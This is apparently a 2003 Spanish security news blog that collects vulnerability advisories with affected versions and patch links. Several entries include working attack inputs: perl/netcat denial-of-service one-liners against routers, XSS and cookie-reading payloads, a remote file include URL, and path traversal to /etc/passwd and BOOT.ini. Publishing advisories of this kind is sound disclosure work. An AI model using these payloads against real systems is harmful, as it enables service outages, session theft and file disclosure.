Shell Security - Seguridad informática Noticias diarias de seguridad informática, foros, vulnerabilidades, antivirus, documentación, auditorías, consultorías …

——————————————
-Vulnerabilidad en Apache HTTP Server v2 -
——————————————

Problema:

La vulnerabilidad es local y permite a un atacante provocar un denial of service debido a un malicioso archivo "type-map".

Versiones vulnerables:

Apache Software Foundation Apache 1.3.20
Apache Software Foundation Apache 1.3.22
Apache Software Foundation Apache 1.3.23
Apache Software Foundation Apache 1.3.24
Apache Software Foundation Apache 1.3.27
Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.44
Apache Software Foundation Apache 2.0.45
Apache Software Foundation Apache 2.0.46
Apple Mac OS X 10.0
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.4
Apple Mac OS X 10.1
Apple Mac OS X 10.1.1
Apple Mac OS X 10.1.2
Apple Mac OS X 10.1.3
Apple Mac OS X 10.1.4
Apple Mac OS X 10.1.5
Apple Mac OS X 10.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.5
Apple Mac OS X 10.2.6
Caldera OpenLinux Server 3.1
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1
Caldera OpenLinux Workstation 3.1.1
Conectiva Linux 6
Conectiva Linux 7.0
Conectiva Linux 8.0
Conectiva Linux 9
HP HP-UX 11.20
HP HP-UX 11.22
IBM AIX 4.3
MandrakeSoft Corporate Server 1.0.1
MandrakeSoft Linux Mandrake 7.2
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 PPC
MandrakeSoft Linux Mandrake 9.0
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 PPC
MandrakeSoft Single Network Firewall 7.2
OpenBSD OpenBSD 3.1
OpenPKG OpenPKG 1.0
OpenPKG OpenPKG 1.1
OpenPKG OpenPKG CURRENT
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 9.2.0
Oracle Oracle9i Application Server 1.0.2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 9.0.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3
RedHat Linux 7.3 i386
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
SGI IRIX 6.5.12
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.13
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13 m
SGI IRIX 6.5.14
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14f
SGI IRIX 6.5.14m
SGI IRIX 6.5.15
SGI IRIX 6.5.16
SGI IRIX 6.5.17
SGI IRIX 6.5.18
SGI IRIX 6.5.19
Slackware Linux 8.0
Slackware Linux 8.1
Sun Cobalt Control Station 4100CS
Sun Cobalt RaQ 550
Sun Solaris 8.0
Sun Solaris 8.0_x86
Sun Solaris 9.0
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
Trustix Secure Linux 2.0
Unisphere Networks SDX-300 2.0.3

Solución:

La recomendación es hacer un upgrade a la version Apache 2.0.47, la cual posee la vulnerabilidad parcheada.

QmailAdmin ( http://www.inter7.com/qmailadmin.html ) es una aplicación que permite administar el servidor de correo QMail mediante una interfaz basada en página web.

Recientemente ha aparecido una vulnerabilidad en este software que podría permitir a un atacante la inserción de código mediante la creación de una regla del tipo "Forward". Esto hace posible enviar un email a cualquier comando del sistema que puede ser ejecutado con la identidad del usuario "vpopmail".

Las versiones afectadas son:

inter7 qmailadmin 1.0.13
inter7 qmailadmin 1.0.14
inter7 qmailadmin 1.0.15
inter7 qmailadmin 1.0.16
inter7 qmailadmin 1.0.17
inter7 qmailadmin 1.0.18
inter7 qmailadmin 1.0.19
inter7 qmailadmin 1.0.20
inter7 qmailadmin 1.0.21
inter7 qmailadmin 1.0.22
inter7 qmailadmin 1.0.23
inter7 qmailadmin 1.0.24

Como solución a este problema, se recomienda instalar la versión 1.0.25, la cual corrige esta vulnerabilidad, o bien acudir a la página de parches de este software:

http://sourceforge.net/project/showfiles.php?group_id=6691&release_id=173699

Más información sobre esta vulnerabilidad en: http://www.secunia.com/advisories/9360/

Hoy me he quedado sorprendido al leer esta noticia:

"Los grupos parlamentarios vasco y catalán han presentado un par de enmiendas al código penal que pretende equipar el delito informático al narcotráfico, otorgando a los informes periciales la potestad de destruir antes del juicio las pruebas requisadas.

Las enmiendas número 71 y 215 permitirían que al igual que sucede con los alijos de droga, tanto casettes, como libros, como cintas de video CDs y DVDs considerados ilegales podrán ser eliminados por la vía rápida tras la práctica urgente de un examen pericial, debido a la presunta peligrosidad del material incautado.

Una polémica enmienda que podría conducir a la indefensión de los acusados de delitos contra la propiedad intelectual y que esperemos que por el bien de todos no siga adelante."

Noticia de http://www.hispamp3.com/noticias/noticia.php?noticia=20030723113711

Me parece sorprendente que quieran equiparar el narcotráfico, con el tráfico de software ilegal. Ambos son delitos, y no están bien, pero no creo que haga el mismo daño y mueva las mismas mafias uno que otro. ¿Alguna opinión sobre esto?

1) Vulnerabilidad en el XAVi 7028r
2) Vulnerabilidad en el Microsoft SQL Server
3) Vulnerabilidad en el Microsoft SQL Server Named Pipe
4) Vulnerabilidad en el Solaris 8 LDAP Clear Text Password
5) Vulnerabilidad en el DirectX
6) Vulnerabilidad en el Windows NT 4.0 Server file management
7) Vulnerabilidad en el 3COM 812 DSL routers
Vulnerabilidad en el dtsession
9) Vulnerabilidad en el Phpgroupware
10) Vulnerabilidad en el MSN search results.aspx
11) Vulnerabilidad en el Microsoft Outlook Web Access
12) Vulnerabilidad en el VIM ModeLines
13) Vulnerabilidad en el mpg123
14) Vulnerabilidad en el fdclone
15) Vulnerabilidad en el Ashnews
16) Vulnerabilidades en el Savant WebServer 3.1
17) Vulnerabilidades en el phpMyAdmin
18) Vulnerabilidad en el Solaris 8 IPv6 Packets

——————————————————————-

1)

———————————————
-Vulnerabilidad en el XAVi 7028r -
———————————————

Problema:

La vulnerabilidad es local y permite a un atacante causar un denial of service en el router asi provocando un "crash".

ejemplo de la vulnerabilidad:

Perl - and ‘ print "GET /"."A"x1008;print "HTTP/1.1\nHost:192.168.1.1:280\n\n\n\n" ‘ | netcat - v - n 192.168.1.1 280

Versiones vulnerables:

XAVi 7028r ADSL Wireless Gateway

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

La unica solución hasta el momento es desactivar la interface web

——————————————————

2)

———————————————————–
-Vulnerabilidad en el Microsoft SQL Server -
———————————————————–

Problema:

Esta vulnerabilidad es remota y permite a un atacante elevar y privilegios y asi causar la ejecución arbitraria de codigo, mediante un "buffer overrun"

Versiones vulnerables:

Microsoft Data Engine 1.0
Microsoft Data Engine 2000
Microsoft SQL Server 2000
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 7.0

Solución:

La solución es bajarse los fixes de estas paginas:

http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

——————————————————

3)

—————————————————————————
-Vulnerabilidad en el Microsoft SQL Server Named Pipe -
—————————————————————————

Problema:

Esta vulnerabilidad permite a un atacante a ejecutar codigo arbitrariamente o elevar los permisos, pero tambien es posible que el atacante provoque un denial of service.

Versiones vulnerables:

Microsoft Data Engine 1.0
Microsoft Data Engine 2000
Microsoft SQL Server 2000
Microsoft SQL Server 2000 Desktop Engine
Microsoft SQL Server 7.0

Solución:

La solución es bajarse los fixes de estas paginas:

http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

——————————————————

4)

———————————————————–
-Vulnerabilidad en el Solaris 8 LDAP Clear Text Password -
———————————————————–

Problema:

Esta vulnerabilidad permite que un atacante acceda al usuario del proxy agent, por que la clave de este usuario esta en texto y no encriptada.

Para comprobar si esta configurado el LDAP client, ponemos este comando:

$ ldapclient -l
NS_LDAP_FILE_VERSION= 1.0
NS_LDAP_BINDDN= cn=proxyagent,ou=profile,dc=blr03-01,dc=india,dc=sun,dc=com
NS_LDAP_BINDPASSWD= {NS1}3d1a48e906c04161baa4
NS_LDAP_SERVERS= 1XX.1XX.233.128
NS_LDAP_SEARCH_BASEDN= dc=blr03-01,dc=india,dc=Sun,dc=COM
NS_LDAP_AUTH= NS_LDAP_AUTH_SIMPLE
NS_LDAP_SEARCH_REF= NS_LDAP_FOLLOWREF
NS_LDAP_SEARCH_SCOPE= NS_LDAP_SCOPE_ONELEVEL
NS_LDAP_SEARCH_TIME= 30
NS_LDAP_PROFILE= s8prof1

Versiones vulnerables:

Sun Solaris 8.0

Solución:

- editar el archivo: "/etc/syslog.conf" y remover este campo "*.err"

Cambiar:
*.err;kern.debug;mail.crit /var/adm/messages
a
kern.debug;mail.crit /var/adm/messages

o bajarse el parche desde:

http://sunsolve.sun.com/

——————————————————

5)

—————————————-
-Vulnerabilidad en el DirectX -
—————————————-

Problema:

Esta vulnerabilidad permite a un atacante remoto a ejecutar codigo y asi comprometer el sistema.

Versiones vulnerables:

Microsoft DirectX 5.2
Microsoft DirectX 6.1
Microsoft DirectX 7.0
Microsoft DirectX 7.0a
Microsoft DirectX 8.1
Microsoft DirectX 9.0a
Microsoft Windows Media Player 6.4
Microsoft Windows NT 4.0
Microsoft Windows NT Terminal Server 4.0

Solución:

La solución es bajarse el parche desde:

http://microsoft.com/downloads/

——————————————————

6)

————————————————————-
-Vulnerabilidad en el Windows NT 4.0 Server file management -
————————————————————-

Problema:

Esta vulnerabilidad permite que un atacante logre hacer un denial of service a la aplicación, asi provocando un "crash".

Versiones vulnerables:

Microsoft Windows NT Server 4.0
Microsoft Windows NT Terminal Server 4.0

Solución:

La solución es bajarse los fixes de estas paginas:

http://microsoft.com/downloads/details.aspx?FamilyId=8FF8CA3E-D546-4FAF-851F-FFBE2490B901&displaylang=en

http://microsoft.com/downloads/details.aspx?FamilyId=5C46460D-3887-4D5F-B142-F505BB208797&displaylang=en

——————————————————

7)

————————————————————-
-Vulnerabilidad en el 3COM 812 DSL routers –
————————————————————-

Problema:

Esta vulnerabilidad permite un denial of service en el 3COM 812 DSL routers provocando que un atacante remoto pueda provocar un crash y asi tener que rebootear el router.

ejemplo de la vulnerabilidad:

perl -e ‘print "A"x512;print "\n\n\n\n\n\n\n\n"’ | netcat -v -n 192.168.0.1 80

Versiones vulnerables:

3Com OfficeConnect DSL Router 812 1.1.9
3Com OfficeConnect DSL Router 812 2.0

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————

——————————————-
-Vulnerabilidad en el dtsession -
——————————————-

Problema:

este comando comprueba si el BugID 4788212 esta presente:

# /usr/ccs/bin/mcs -p /usr/dt/bin/dtsession
"@(#)CDEVersion1.5.3":sparc:26Nov02-12:13:22

si el output dice que la fecha esta en el 10Jan03 el sistema no esta afectado
como este:

"@(#)CDEVersion1.5.3_06":sparc:10Jan03-21:35:07

Versiones vulnerables:

Sun Solaris 9.0 Sparc
Sun Solaris 9.0 _x86

Solución:

Para consultar sobre el parche consultar en:

http://sunsolve.sun.com/

——————————————————

9)

————————————————-
-Vulnerabilidad en el Phpgroupware -
————————————————-

Problema:

Esta vulnerabilidad permite a un atacante remoto a ejecutar un script malicioso en el sistema.

ejemplo de la vulnerabilidad:

http://[target]/addressbook/index.php?

usted puede agregar <script>alert();</script> en el nombre o segundo nombre.

Versiones vulnerables:

Conectiva Linux 7.0
Conectiva Linux 8.0
Conectiva Linux 9
PHPGroupWare PHPGroupWare 0.9.14.003

Solución:

VULNERABILITY SOLUTION

La solución es bajarse la ultima version 0.9.14.006 del phpGroupWare, la cual contiene los parches de esta vulnerabilidad.

Para bajarse los parches de estas paginas ir a:

http://www.phpgroupware.org/downloads/

ftp://atualizacoes.conectiva.com.br/

——————————————————

10)

—————————————————————
-Vulnerabilidad en el MSN search results.aspx -
————————————————————–

Problema:

Esta vulnerabilidad de llama cross site scripting y se encuentra en el MSN search results.aspx.

Versiones vulnerables:

MSN MSN Search .

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————

11)

————————————————————————
-Vulnerabilidad en el Microsoft Outlook Web Access -
————————————————————————

Problema:

Esta vulnerabilidad permite un denial of service.

Versiones vulnerables:

Microsoft Exchange Server 5.5
Microsoft IIS .

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————

12)

—————————————————-
-Vulnerabilidad en el VIM ModeLines -
—————————————————-

Problema:

Esta vulnerabilidad permite a un atacante local a que si crea un archivo de texto malicioso que contenga comandos arbitrarios de shell, permitiria al atacante que cause que se ejecuten
estos comandos con los privilegios del usuario con que se abre el archivo con el VIM

Versiones vulnerables:

Caldera OpenLinux 2.3
MandrakeSoft Linux Mandrake 7.2
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 PPC
MandrakeSoft Linux Mandrake 9.0
MandrakeSoft Multi Network Firewall 8.2
MandrakeSoft Single Network Firewall 7.2
RedHat Linux 5.2
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 for iSeries
RedHat Linux 7.1 for pSeries
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
RedHat Linux 8.0
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.4
S.u.S.E. Linux 7
S.u.S.E. Linux 7.1
SCO eDesktop 2.4
SCO eServer 2.3.1
Sun Cobalt Qube 3.0
Sun Cobalt RaQ 4
Sun Cobalt RaQ XTR .
Sun Cobalt RaQ550 .
VIM Development Group VIM 5.0
VIM Development Group VIM 5.1
VIM Development Group VIM 5.2
VIM Development Group VIM 5.3
VIM Development Group VIM 5.4
VIM Development Group VIM 5.5
VIM Development Group VIM 5.6
VIM Development Group VIM 5.7
VIM Development Group VIM 5.8
VIM Development Group VIM 6.0
VIM Development Group VIM 6.1

Solución:

Usuarios de Gentoo Linux hacer lo siguiente:

emerge sync
emerge -u vim-core
emerge -u vim
emerge -u gvim
emerge clean

Usuarios de Mandrake bajarse los parches desde:

http://www.mandrakesecure.net/en/ftp.php

Usuarios de RedHat bajarse los parches desde:

ftp://updates.redhat.com/

Usuarios de Sun bajarse los parches desde:

http://ftp.cobalt.sun.com/pub/

——————————————————

13)

—————————————-
-Vulnerabilidad en el mpg123 -
—————————————-

Problema:

Esta vulnerabilidad permite a un atacante remoto a ejecutar codigo, cuando un archivo malicioso esta siendo escuchado, el codigo seria ejecutado con los privilegios que tenga
el mpg123.

Versiones vulnerables:

Conectiva Linux 7.0
Conectiva Linux 8.0
mpg123 mpg123 0.59 r
mpg123 mpg123 pre0.59s

Solución:

La solución es bajarse los parches desde:

ftp://atualizacoes.conectiva.com.br/

——————————————————

14)

—————————————-
-Vulnerabilidad en el fdclone -
—————————————-

Problema:

Esta vulnerabilidad permite al atacante a acceder a los archivos temporarios del fdclone’s y su contenido o reemplazar por otros archivos.
El fdclone crea los archivos temporarios en el directorio /tmp

Versiones vulnerables:

Debian Linux 3.0 (woody)
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia-32
Debian Linux 3.0 m68k
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc

Solución:

La solución es bajarse los parches desde:

http://security.debian.org/pool/updates/main/f/fdclone/fdclone_2.00a-1woody3.dsc

——————————————————

15)

——————————————
-Vulnerabilidad en el Ashnews -
——————————————

Problema:

Esta vulnerabilidad permite a un atacante a crear un codigo de php arbitrario y colocarlo en el host remoto.

ejemplo de la vulnerabilidad:

Example:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]

Versiones vulnerables:

ashwebstudio ashnews 0.83

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————

16)

————————————————————–
-Vulnerabilidades en el Savant WebServer 3.1 -
————————————————————–

Problemas:

Esta vulnerabilidad es remota y permite a un atacante provocar un denial of service, un buffer overflow y un cross site scripting

ejemplos:

1. Buffer overflow usando request de GET:

Get /%s%s%sindex.htmlindex.htmlindex.html………………index.html

Get /tag3.jpg%00%00%00%00%00%00%00%…………….00%00%00

esto provocaria que el Savant provoque un "crash"

2. Buffer overflow usando conexiones multiples:

3. Cross site scripting:

ejemplo:

http://[target]/cgitest.html?<script>window.location="/cgi-bin/cgitest.exe?|<blahblah>%00";</script&gt;

otro ejemplo:

http://[target]/cgitest.html?<script>(document.cookie)</script&gt;

4. Denial of service:

Esta es otra forma de provocar un denial of service.

http://[target]/%-$%/’%/,%/)%//%0%%0!%/#%./%/!%20%,(%/#%/#%0!%/!%0&%//%20%/*%/%%/)%/,%.-%/-%//%0%.txt

Versiones vulnerables:

Michael Lamont Savant WebServer 3.1

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————

17)

—————————————————-
-Vulnerabilidades en el phpMyAdmin -
—————————————————-

Multiples vulnerabilidades han sido detectadas en el phpMyAdmin, las cuales permitirian a un atacante ejecutar codigo y acceder a información sensible.

ejemplos de las vulnerabilidades:

1. Cross site scripting y muestra del path

2. Directorio tranversal

3. Información sin coding: solo guarda los usuarios y las claves en texto plano.

ejemplos:

http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>

http://localhost/mysql/db_datadict.php?db=XSS

http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../BOOT.ini

http://localhost/mysql/read_dump.php?db=nonexistent&sql_query="><h1>XSS</h1&gt;

http://localhost/mysql/tbl_properties_links.php?table_info_num_rows=10&url_query="><h1>XSS

Versiones vulnerables:

Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 4.2
MandrakeSoft Linux Mandrake 7
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.2
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.8
PhpMyAdmin PhpMyAdmin 2.0
PhpMyAdmin PhpMyAdmin 2.0.1
PhpMyAdmin PhpMyAdmin 2.0.2
PhpMyAdmin PhpMyAdmin 2.0.3
PhpMyAdmin PhpMyAdmin 2.0.4
PhpMyAdmin PhpMyAdmin 2.0.5
PhpMyAdmin PhpMyAdmin 2.1
PhpMyAdmin PhpMyAdmin 2.1.1
PhpMyAdmin PhpMyAdmin 2.1.2
PhpMyAdmin PhpMyAdmin 2.2.2
PhpMyAdmin PhpMyAdmin 2.2.3
PhpMyAdmin PhpMyAdmin 2.2.4
PhpMyAdmin PhpMyAdmin 2.2.5
PhpMyAdmin PhpMyAdmin 2.2.6
PhpMyAdmin PhpMyAdmin 2.3.1
PhpMyAdmin PhpMyAdmin 2.3.2
PhpMyAdmin PhpMyAdmin 2.4.0
PhpMyAdmin PhpMyAdmin 2.5.0
PhpMyAdmin PhpMyAdmin 2.5.1
RedHat Linux 6.2
RedHat Linux 7.0
S.u.S.E. Linux 6.4
S.u.S.E. Linux 7
S.u.S.E. Linux 7.1
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86

Solución:

La solución es instalar la version phpMyAdmin 2.5.2 , la cual contiene
los fixes correspondientes.

——————————————————

18)

———————————————————–
-Vulnerabilidad en el Solaris 8 IPv6 Packets -
———————————————————–

Problema:

Esta vulnerabilidad permite un denial of service.

Versiones vulnerables:

Sun Solaris 8.0

Solución:

Hacer lo siguiente:

desactivar el IPv6 en el sistema.

Para determinar si el IPv6 esta activo en el sistema hacer lo siguiente:

$ ifconfig -a6

Si sale marcado "UP and RUNNING" IPv6 esta activo en el sistema.

Para desactivar el IPv6 en el sistema hacer lo siguiente:

# ifconfig -a6 down
Editar el archivo "/etc/nsswitch.conf" y cambiar la entrada "ipnodes" a "files" solamente.
y rebotear el sistema.

——————————————————

Microsoft ha advertido que una de las partes de Windows que gestiona las capacidades multimedia del sistema operativo, concretamente DirectX, contiene dos agujeros de seguridad con el que un intruso podría controlar el ordenador.
DirectX se encarga entre otras cosas de ejecutar archivos MIDI, y el fallo de seguridad encontrado por Microsoft dejaría abierta la posibilidad de un ataque de forma que el sistema ejecute un archivo MIDI corrupto hospedado en un servidor, o también un archivo en HTML.

DirectX forma parte de la mayoría de las versiones actuales de Windows, como 98, XP y 2000. No así en NT 4.0 y NT 4.0 Terminal Server Edition, que sólo son vulnerables si se instala Windows Media Player 6.4 o Internet Explorer 6 Service Pack 1.

Las versiones de DirectX afectadas por este fallo son de la 5.2 a la 9.0, según el comunicado de Microsoft. Los parches para esta aplicación están disponibles en la página web de soporte de la compañía, junto con la versión DirectX 9.0b que ya incluye el arreglo.

El agujero de seguridad en este componente de Windows afecta a las versiones 5.2 a 9.0 de DirectX

Más información sobre esta noticia en http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-030.asp

Fuente: http://www.idg.es

Hacía meses que Apache ( http://www.apache.org ) no lanzaba una nueva versión de su rama 1.x, y ahora ha salido Apache 1.3.28, en la cual se corrigen algunas vulnerabilidades:

- Vulnerabilidad que afectaba sólo a Apache bajo sistemas Windows, mediante la cual la opción ‘ratelogs’ provocaba una denegación de servicio ante ciertos caracteres especiales de control.

- Posibilidad de denegación de servicio producida por un bucle infinito basado en redirecciones internas y peticiones anidadas.

- Eliminada una fuga de descriptores de fichero a procesos hijo, como por ejemplo CGI scripts

Esta nueva versión puede ser descargada desde:

http://httpd.apache.org/download.cgi

http://www.apache.org/dist/httpd/

El anuncio de la nueva versión lo podeis encontrar en: http://www.apache.org/dist/httpd/Announcement.html

1) Vulnerabilidad en Drupal
2) Vulnerabilidad en AtomicBoard-0.6.2
3) Vulnerabilidad en WebCalendar
4) Vulnerabilidad en Witango Application Server
5) Multiples vulnerabilidad en Apache HTTP Server
6) Vulnerabilidad en "SurfControl Filter for SMTP"
7) Vulnerabilidad en "CFTP"
Denial of service en "Cisco CatOS"
9) Vulnerabilidad en "SimpNews"
10) Vulnerabilidad en RAV Antivirus Online Scanning
11) Vulnerabilidad en CGI.pm
12) Vulnerabilidad en "Ethereal"

——————————————————————-

1)

—————————————-
-Vulnerabilidad en Drupal-
—————————————-

Problema: "Cross site scripting"

Existe una vulnerabilidad("cross site scripting") en el Drupal que permite
a un atacante acceder a las cuentas de otros usuarios y hasta la del admin.

Ejemplos:

1) http://[victim]/xxx"][script]alert(document.domain)]/script][&quot;

2) http://[victim]/node/view/666"><script>alert(document.domain)</script&gt;

–Reemplazar "[]","<>"

Versiones vulnerables:

Drupal Drupal 4.2.0 RC

Solución:

En esta dirección podra encontrar el parche:

http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip

——————————————————————-

2)

—————————————————
-Vulnerabilidad en AtomicBoard-0.6.2-
—————————————————

Problema: "Muestra del Path y archivos"

Existe la vulnerabilidad en el AtomicBoard que permite a un atacante remoto ver archivos mediante el webserver.

Ejemplos:

Muestra del Archivos:

http://server/atomicboard/index.php?location=../../../../../../etc/passwd

Muestra del Path:
http://server/AtomicBoard-0.6.2/index.php?location=anything

Versiones vulnerables:

AtomicBoard AtomicBoard 0.6.2

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————————-

3)

———————————————
-Vulnerabilidad en WebCalendar-
———————————————

Problema: "Directorio transversal"

La vulnerabilidad es remota y mediante una petición "../../" un atacante remoto puede ver
arbitrariamente archivos.

Ejemplo:

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd

Versiones vulnerables:

SourceForge.net WebCalendar 0.9.41

Solución:

La solución a este problema la puede encontrar en:

http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

——————————————————————-

4)

————————————————————
-Vulnerabilidad en Witango Application Server-
————————————————————

Problema: "Buffer overflow"

La vulnerabilidad es remota y permite a un atacante ejecutar codigo malicioso con los
privilegios del Witango.

Ejemplo:

GET /ngssoftware.tml HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*
Accept-Language: en-gb
User-Agent: My Browser
Host: ngssoftware.com
Connection: Keep-Alive
Cookie: Witango_UserReference= parameter length 2864

Versiones vulnerables:

Witango Tango 2000 .
Witango Witango Application Server 5.0.1 .061

Solución:

Todavia no se encuentra disponible ninguna solución a esta
vulnerabilidad.

——————————————————————-

5)

————————————————————–
-Multiples vulnerabilidad en Apache HTTP Server-
————————————————————–

Problema: "Multiples vulnerabilidad"

La vulnerabilidad es remota y permite a un atacante producir un "Denial of service"

Versiones vulnerables:

Apache Software Foundation Apache 1.3.1
Apache Software Foundation Apache 1.3.10
Apache Software Foundation Apache 1.3.11
Apache Software Foundation Apache 1.3.12
Apache Software Foundation Apache 1.3.14
Apache Software Foundation Apache 1.3.17
Apache Software Foundation Apache 1.3.18
Apache Software Foundation Apache 1.3.19
Apache Software Foundation Apache 1.3.20
Apache Software Foundation Apache 1.3.22
Apache Software Foundation Apache 1.3.23
Apache Software Foundation Apache 1.3.24
Apache Software Foundation Apache 1.3.25
Apache Software Foundation Apache 1.3.26
Apache Software Foundation Apache 1.3.27
Apple Mac OS X 10.0.3
Caldera OpenLinux Server 3.1
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1
Caldera OpenLinux Workstation 3.1.1
Compaq Tru64 4.0 f
Compaq Tru64 4.0 g
Compaq Tru64 5.0
Conectiva Linux 6
Conectiva Linux 7.0
Conectiva Linux 8.0
Debian Linux 2.2
Debian Linux 2.2 68k
Debian Linux 2.2 IA-32
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
EnGarde Secure Linux 1.0.1
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 4.2
HP HP-UX 10.20
HP HP-UX 11.00
HP HP-UX 11.04
HP HP-UX 11.11
HP HP-UX 11.20
HP HP-UX 11.22
HP Secure OS software for Linux 1.0
HP VirtualVault 4.5
IBM AIX 4.3
MandrakeSoft Linux Corporate Server 1.0.1
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.2
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 PPC
MandrakeSoft Linux Mandrake 9.0
MandrakeSoft Single Network Firewall 7.2
NetBSD NetBSD 1.5
NetBSD NetBSD 1.5.1
NetScreen Global PRO Express Policy Manager Server .
NetScreen Global PRO Policy Manager Server .
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 3.0
OpenBSD OpenBSD 3.1
OpenPKG OpenPKG 1.0
OpenPKG OpenPKG 1.1
OpenPKG OpenPKG CURRENT
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 9.2.0
Oracle Oracle9i Application Server 1.0.2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 9.0.2
RedHat Linux 5.2 alpha
RedHat Linux 5.2 i386
RedHat Linux 5.2 sparc
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 alpha
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3
